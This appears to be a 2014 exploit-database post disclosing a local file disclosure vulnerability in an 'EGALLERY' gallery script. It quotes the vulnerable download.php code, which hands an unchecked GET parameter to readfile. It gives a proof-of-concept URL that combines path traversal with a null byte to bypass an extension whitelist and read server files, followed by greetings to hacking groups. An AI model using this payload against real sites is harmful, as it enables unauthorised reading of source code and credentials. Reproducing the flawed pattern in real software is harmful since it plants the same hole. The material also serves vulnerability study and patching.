facebook facebook twitter rss

EGALLERY (all versions) LFD Vulnerability

Author: GEOIX , Published: 04-01-2014
############################################################################
# Exploit Title : EGALLERY (all versions) LFD Vulnerability
# Author : GEOIX
# Tested On : Windows
# Date : 04/01/2014
# Other Exploit by : TUNISIAN CYBER
# => http://www.exploit4arab.net/exploits/673
#############################################################################

#> Description: egallery/download.php

44: $filename = $_GET['image'];
45: $file = '../' . $filename;
87: readfile($file);

=> Note that protected function by array
{$extension, array('jpg', 'png', 'gif'
new we use Null Byte (%00).

#> p0c :

=> site.com/download.php?image=../xxx.php%00 (in the root file).

##############################################################################

Greets to: TUNISIAN CYBER, Muslim-Dz, Geniu Mouk , Eve Dized .

Sec4Ever Members Top : DamaneDz ,UzunDz , Gastro

Like us on Facebook :